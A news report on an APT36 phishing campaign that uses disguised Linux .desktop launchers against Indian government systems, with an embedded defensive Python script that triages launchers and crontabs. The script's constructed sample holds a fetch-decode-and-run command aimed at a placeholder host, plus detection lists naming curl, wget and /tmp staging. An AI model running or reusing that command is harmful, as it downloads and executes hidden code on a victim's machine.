A sophisticated cyber-espionage campaign linked to the Pakistani-origin threat group Transparent Tribe (APT36) has been uncovered, targeting Indian government systems with weaponized desktop shortcut files. Security researchers warn that the group’s latest operations demonstrate an evolving ability to compromise both Windows and BOSS (Bharat Operating System Solutions) Linux platforms.
Dual-Platform Attacks with Phishing Emails
According to cybersecurity firm CYFIRMA, the intrusion begins with spear-phishing emails disguised as meeting notices. These emails deliver malicious Linux .desktop launcher files that pose as PDF documents, such as Meeting_Ltr_ID1543ops.pdf.desktop. When a victim opens one, its Exec entry runs a shell script that fetches a hex-encoded payload from an attacker-controlled domain, securestore[.]cv, decodes it and deploys it as an ELF binary.
At the same time, a decoy PDF hosted on Google Drive is opened in Firefox to keep up the illusion of a legitimate document. The malware then connects to a hard-coded command-and-control (C2) server, modgovindia[.]space:4000, from which the operators issue commands, exfiltrate data, and download additional payloads. Persistence is achieved through cron jobs, so the implant is relaunched even after a reboot.
CloudSEK researchers, who independently verified the activity, highlighted anti-debugging and sandbox-evasion checks designed to frustrate dynamic analysis. The malware eventually deploys Poseidon, a backdoor linked to Transparent Tribe, capable of reconnaissance, credential theft, and long-term surveillance of sensitive government infrastructure.
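The infection chain above leaves a small set of host-side traits that are easy to triage: a launcher named like a document, an Exec line that shells out to fetch and hex-decode a file, a hosted decoy opened in a browser, and a cron entry that relaunches something from a temp path. The script below is an added example, not tooling from CYFIRMA, CloudSEK or the reporting outlet. The indicator list, the sample launcher contents, the payload host and the decoy link are assumptions constructed for the example; only the file name Meeting_Ltr_ID1543ops.pdf.desktop is taken from the report.

```python
"""Triage Linux .desktop launchers and crontab entries for the traits described
above: a launcher named like a PDF, an Exec line that shells out to fetch and
hex-decode a payload, a hosted decoy document opened in a browser, and cron
persistence. Added example, not the researchers' tooling."""
import configparser
import re
from pathlib import Path

# Exec tokens worth a second look. The list is an assumption for this example,
# not an indicator set published by CYFIRMA or CloudSEK.
SUSPICIOUS_EXEC_TOKENS = (
    "sh -c", "bash -c", "curl ", "wget ", "xxd -r", "base64 -d",
    "chmod +x", "nohup ", "/tmp/", "/dev/shm/",
)
PDF_READER_RE = re.compile(r"\b(evince|okular|xreader|atril|zathura|mupdf|xdg-open)\b")
DECOY_URL_RE = re.compile(r"https?://(drive|docs)\.google\.com/\S+", re.I)
DOUBLE_EXT_RE = re.compile(r"\.(pdf|docx?|xlsx?|pptx?)\.desktop$", re.I)
CRON_SUSPECT_RE = re.compile(r"(/tmp/|/dev/shm/|\bcurl\b|\bwget\b|\b(ba)?sh -c|@reboot)")

# Constructed samples. The file name is the one reported in the article; the
# contents, the payload host and the decoy link are placeholders, not the
# actual campaign artefact.
SAMPLE_MALICIOUS = ("Meeting_Ltr_ID1543ops.pdf.desktop", """[Desktop Entry]
Type=Application
Name=Meeting_Ltr_ID1543ops.pdf
Icon=application-pdf
Terminal=false
Exec=sh -c "curl -s https://payload.example/p.hex | xxd -r -p > /tmp/.s; chmod +x /tmp/.s; nohup /tmp/.s >/dev/null 2>&1 & firefox https://drive.google.com/file/d/EXAMPLE_ID/view"
""")
SAMPLE_BENIGN = ("firefox.desktop", """[Desktop Entry]
Type=Application
Name=Firefox Web Browser
Icon=firefox
Terminal=false
Exec=firefox %u
""")
SAMPLE_CRONTAB = """# m h dom mon dow command
0 3 * * * /usr/bin/certbot renew --quiet
@reboot /tmp/.s
*/10 * * * * /tmp/.s >/dev/null 2>&1
"""


def parse_desktop_entry(text):
    """Return the [Desktop Entry] section as a dict; keys stay case-sensitive."""
    cp = configparser.ConfigParser(interpolation=None, strict=False, delimiters=("=",))
    cp.optionxform = str  # keep Exec/Name/Icon as written
    try:
        cp.read_string(text)
    except configparser.Error:
        return {}
    return dict(cp["Desktop Entry"]) if cp.has_section("Desktop Entry") else {}


def triage_desktop_file(filename, text):
    """Return (verdict, reasons) for one launcher; verdict is 'suspicious' or 'clean'."""
    entry = parse_desktop_entry(text)
    exec_line = entry.get("Exec", "")
    reasons = []
    name = Path(filename).name
    if DOUBLE_EXT_RE.search(name):
        reasons.append(f"launcher named like a document: {name}")
    hits = [t.strip() for t in SUSPICIOUS_EXEC_TOKENS if t in exec_line]
    if hits:
        reasons.append("Exec shells out, fetches, decodes or stages a file: " + ", ".join(hits))
    if DECOY_URL_RE.search(exec_line):
        reasons.append("Exec opens a hosted document, consistent with a decoy")
    if "pdf" in entry.get("Icon", "").lower() and not PDF_READER_RE.search(exec_line):
        reasons.append("PDF icon but Exec is not a document viewer")
    if entry.get("Terminal", "false").lower() == "false" and ("sh -c" in exec_line or "bash -c" in exec_line):
        reasons.append("shell command runs with no visible terminal")
    return ("suspicious" if len(reasons) >= 2 else "clean"), reasons


def suspicious_cron_lines(crontab_text):
    """Return crontab lines that run from temp paths, fetch from the network, or fire at boot."""
    out = []
    for line in crontab_text.splitlines():
        line = line.strip()
        if line and not line.startswith("#") and CRON_SUSPECT_RE.search(line):
            out.append(line)
    return out


if __name__ == "__main__":
    import sys
    roots = [Path(p) for p in sys.argv[1:]] or [
        Path.home() / d for d in ("Desktop", "Downloads", ".local/share/applications", ".config/autostart")]
    for root in roots:
        for path in (root.rglob("*.desktop") if root.is_dir() else []):
            verdict, reasons = triage_desktop_file(path.name, path.read_text(errors="replace"))
            if verdict == "suspicious":
                print(path, *reasons, sep="\n  ")
    print("constructed sample:", *triage_desktop_file(*SAMPLE_MALICIOUS))
    print("constructed crontab:", suspicious_cron_lines(SAMPLE_CRONTAB))
```

Run it with one or more directories as arguments, or with none to sweep the current user's Desktop, Downloads, applications and autostart directories; pipe `crontab -l` output into `suspicious_cron_lines` to cover the persistence step. Two or more reasons are required for a "suspicious" verdict because each trait on its own (a `Terminal=false` launcher that calls `sh -c`, an `@reboot` cron entry) also occurs in legitimate setups.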
Continued Targeting of Kavach Authentication
The campaign builds on Transparent Tribe's recent attacks on Indian defence entities, where spoofed domains were used to steal credentials and bypass Kavach, the two-factor authentication (2FA) system used by Indian government agencies. Victims who entered their official email IDs were redirected to phishing pages that prompted for their passwords and Kavach codes, letting the attackers take over the accounts.
CYFIRMA noted that the use of typo-squatted domains and Pakistan-hosted infrastructure is consistent with the group’s long-standing tactics. Hunt.io’s parallel research has linked similar spear-phishing operations to SideCopy, a sub-cluster of Transparent Tribe, with activity extending to Bangladesh, Nepal, Sri Lanka, and Turkey.
These revelations underscore the growing identity security risks posed by South Asian APT groups, which continue to exploit social engineering, phishing, and infrastructure mimicry to breach critical national institutions.